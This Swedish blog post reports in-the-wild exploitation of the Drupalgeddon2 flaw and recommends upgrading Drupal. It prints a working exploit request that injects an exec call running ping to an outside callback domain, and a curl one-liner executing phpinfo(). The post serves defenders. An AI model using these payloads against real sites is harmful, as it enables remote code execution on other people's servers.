Den mycket kritiska sårbarhet som jag bloggade tidigare om som åtgärdats i Drupal har nu börjat att utnyttjas på Internet. ISC som först rapporterade om detta såg scanningar där följande mönster dök upp:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1

Just denna payload försöker enbart att identifiera sårbara Drupal-installationer genom att köra en enkel ping med argumentet -c 1, dvs count 1. Även om många blockerar utgående trafik så kan DNS släppas ut genom brandväggar. Den subdomän under mu6fea.ceye.io har en wildcard-pekning och kan således unikt identifiera varje DNS-läckage och sårbar installation.

Ser man på whois-data för ceye.io så pekar namnservrarna till:

Name Server: NS1.HACKERNEWS.CC
Name Server: NS2.HACKERNEWS.CC

Vilket är en kinesisk nyhetssajt.

Rekommenderad åtgärd är att uppgradera Drupal till version 7.58 eller 8.5.1

Uppdatering: Denna one-liner kan också användas:

curl -X POST –data
'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()'
'https://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'#drupalgeddon2 #Drupal

— Bo0oM (@i_bo0om) April 13, 2018